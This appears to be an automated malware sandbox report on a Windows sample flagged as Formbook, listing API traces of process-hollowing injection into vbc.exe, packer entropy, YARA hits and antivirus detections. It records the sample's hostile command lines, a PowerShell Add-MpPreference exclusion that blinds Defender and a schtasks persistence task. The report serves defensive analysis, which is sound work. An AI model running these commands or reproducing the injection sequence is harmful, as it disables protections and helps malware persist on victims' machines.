NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02220000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02221000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:13 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02222000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02223000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02224000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04991000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02225000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x057c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lDOmXHvRQpZCRr" /XML "C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp"
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\lDOmXHvRQpZCRr.exe"
cmdline	schtasks.exe /Create /TN "Updates\lDOmXHvRQpZCRr" /XML "C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\lDOmXHvRQpZCRr.exe"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 29, 2022, 9:14 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\lDOmXHvRQpZCRr.exe" filepath: powershell	1	1	0
ShellExecuteExW July 29, 2022, 9:14 a.m.	show_type: 0 filepath_r: schtasks.exe parameters: /Create /TN "Updates\lDOmXHvRQpZCRr" /XML "C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp" filepath: schtasks.exe	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00102400', u'virtual_address': u'0x00002000', u'entropy': 7.7612798555755695, u'name': u'.text', u'virtual_size': u'0x00102214'}

entropy

7.76127985558

description

A section with a high entropy has been found

entropy

0.982406086543

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 29, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 29, 2022, 9:39 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	Used Formbook[m]	rule	Win_Trojan_Formbook_m_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lDOmXHvRQpZCRr" /XML "C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp"
cmdline	schtasks.exe /Create /TN "Updates\lDOmXHvRQpZCRr" /XML "C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp"

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: f780bf9d7e75a569bb4f1c275d832c8ed6e5f5b0

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2924 region_size: 184320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002cc	1	0	0

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 29, 2022, 9:14 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÈº´ Í!¸LÍ!This program cannot be run in DOS mode. $À¶b×]×]×]J§]Ë×]J]×]J]×]Rich×]PEL´yôFà ¸ðÐ@Ð@.text¨¶¸ ` base_address: 0x00400000 process_identifier: 2924 process_handle: 0x000002cc	1	1	0
WriteProcessMemory July 29, 2022, 9:14 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2924 process_handle: 0x000002cc	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 29, 2022, 9:14 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÈº´ Í!¸LÍ!This program cannot be run in DOS mode. $À¶b×]×]×]J§]Ë×]J]×]J]×]Rich×]PEL´yôFà ¸ðÐ@Ð@.text¨¶¸ ` base_address: 0x00400000 process_identifier: 2924 process_handle: 0x000002cc	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2392 called NtSetContextThread to modify thread in remote process 2924
NtSetContextThread July 29, 2022, 9:14 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4327664 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002c0 process_identifier: 2924	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2392 resumed a thread in remote process 2924
NtResumeThread July 29, 2022, 9:14 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2924	1	0	0

Executed a process and injected code into it, probably while unpacking (25 events)

Time & API	Arguments	Status	Return
NtResumeThread July 29, 2022, 9:13 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2392	1	0
NtResumeThread July 29, 2022, 9:13 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2392	1	0
NtResumeThread July 29, 2022, 9:13 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 2392	1	0
NtResumeThread July 29, 2022, 9:13 a.m.	thread_handle: 0x00000200 suspend_count: 1 process_identifier: 2392	1	0
NtGetContextThread July 29, 2022, 9:13 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread July 29, 2022, 9:13 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread July 29, 2022, 9:13 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2392	1	0
NtResumeThread July 29, 2022, 9:14 a.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 2392	1	0
NtGetContextThread July 29, 2022, 9:14 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread July 29, 2022, 9:14 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread July 29, 2022, 9:14 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2392	1	0
CreateProcessInternalW July 29, 2022, 9:14 a.m.	thread_identifier: 2780 thread_handle: 0x000003cc process_identifier: 2776 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\lDOmXHvRQpZCRr.exe" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003d4	1	1
CreateProcessInternalW July 29, 2022, 9:14 a.m.	thread_identifier: 2836 thread_handle: 0x0000038c process_identifier: 2832 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lDOmXHvRQpZCRr" /XML "C:\Users\test22\AppData\Local\Temp\tmp46F7.tmp" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003d4	1	1
CreateProcessInternalW July 29, 2022, 9:14 a.m.	thread_identifier: 2928 thread_handle: 0x000002c0 process_identifier: 2924 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002cc	1	1
NtGetContextThread July 29, 2022, 9:14 a.m.	thread_handle: 0x000002c0	1	0
NtAllocateVirtualMemory July 29, 2022, 9:14 a.m.	process_identifier: 2924 region_size: 184320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002cc	1	0
WriteProcessMemory July 29, 2022, 9:14 a.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÈº´ Í!¸LÍ!This program cannot be run in DOS mode. $À¶b×]×]×]J§]Ë×]J]×]J]×]Rich×]PEL´yôFà ¸ðÐ@Ð@.text¨¶¸ ` base_address: 0x00400000 process_identifier: 2924 process_handle: 0x000002cc	1	1
WriteProcessMemory July 29, 2022, 9:14 a.m.	buffer: base_address: 0x00401000 process_identifier: 2924 process_handle: 0x000002cc	1	1
WriteProcessMemory July 29, 2022, 9:14 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2924 process_handle: 0x000002cc	1	1
NtSetContextThread July 29, 2022, 9:14 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4327664 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002c0 process_identifier: 2924	1	0
NtResumeThread July 29, 2022, 9:14 a.m.	thread_handle: 0x000002c0 suspend_count: 1 process_identifier: 2924	1	0
NtResumeThread July 29, 2022, 9:39 a.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread July 29, 2022, 9:39 a.m.	thread_handle: 0x000002f0 suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread July 29, 2022, 9:39 a.m.	thread_handle: 0x0000043c suspend_count: 1 process_identifier: 2776	1	0
NtResumeThread July 29, 2022, 9:39 a.m.	thread_handle: 0x0000049c suspend_count: 1 process_identifier: 2776	1	0

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Bkav	W32.AIDetectNet.01
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKDZ.90240
FireEye	Generic.mg.e3f61572c6aff795
Cylance	Unsafe
K7AntiVirus	Trojan ( 005961dc1 )
K7GW	Trojan ( 005961dc1 )
Cyren	W32/MSIL_Agent.DPT.gen!Eldorado
Symantec	Scr.Malcode!gdn34
ESET-NOD32	a variant of MSIL/GenKryptik.FXYX
APEX	Malicious
ClamAV	Win.Dropper.NetWire-9958815-0
Kaspersky	HEUR:Backdoor.MSIL.Androm.gen
BitDefender	Trojan.GenericKDZ.90240
Avast	Win32:PWSX-gen [Trj]
Ad-Aware	Trojan.GenericKDZ.90240
Emsisoft	Trojan.GenericKDZ.90240 (B)
DrWeb	Trojan.PackedNET.1462
Trapmine	suspicious.low.ml.score
Sophos	ML/PE-A + Mal/Kryptik-ES
SentinelOne	Static AI - Malicious PE
GData	Trojan.GenericKDZ.90240
MAX	malware (ai score=87)
Arcabit	Trojan.Generic.D16080
Microsoft	TrojanSpy:Win32/Swotter.A!bit
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.PWSX-gen.C5214700
Acronis	suspicious
VBA32	CIL.HeapOverride.Heur
Malwarebytes	Trojan.MalPack.PNG.Generic
Rising	Trojan.Generic/MSIL@AI.98 (RDM.MSIL:DfJYqDlhaxiVokYK9nI/4w)
Ikarus	Trojan-Spy.FormBook
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/GenKryptik.FVXS!tr
BitDefenderTheta	Gen:NN.ZemsilF.34806.bn0@aen8E6m
AVG	Win32:PWSX-gen [Trj]

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All